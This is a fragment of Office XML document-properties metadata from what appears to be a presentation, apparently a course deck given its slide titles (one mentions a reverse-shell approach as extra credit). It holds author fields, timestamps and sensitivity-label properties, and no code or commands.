      <vt:lpstr>Extra credits: Another approach for reverse shell</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Assignment</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Sajin.Shivdas@fdf.gov.ae</dc:creator>
  <cp:lastModifiedBy>Sajin Shivdas Sivadasan Shridharan</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-14T14:43:27Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-23T06:10:45Z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46707a-0714-4b19-9e75-9e86a08e862d_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SetDate">
    <vt:lpwstr>2022-09-05T12:28:35Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Method">
    <vt:lpwstr>Standard</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_Name">
    <vt:lpwstr>defa4170-0d19-0005-0004-bc88714345d2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_SiteId">
    <vt:lpwstr>e902b1b3-068c-446e-83b4-e3dfa474e6f9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ActionId">
    <vt:lpwstr>0f084cfb-078a-4cb3-b4bd-6d0825afb445</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_2f46707a-0714-4b19-9e75-9e86a08e862d_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
</Properties>
</file>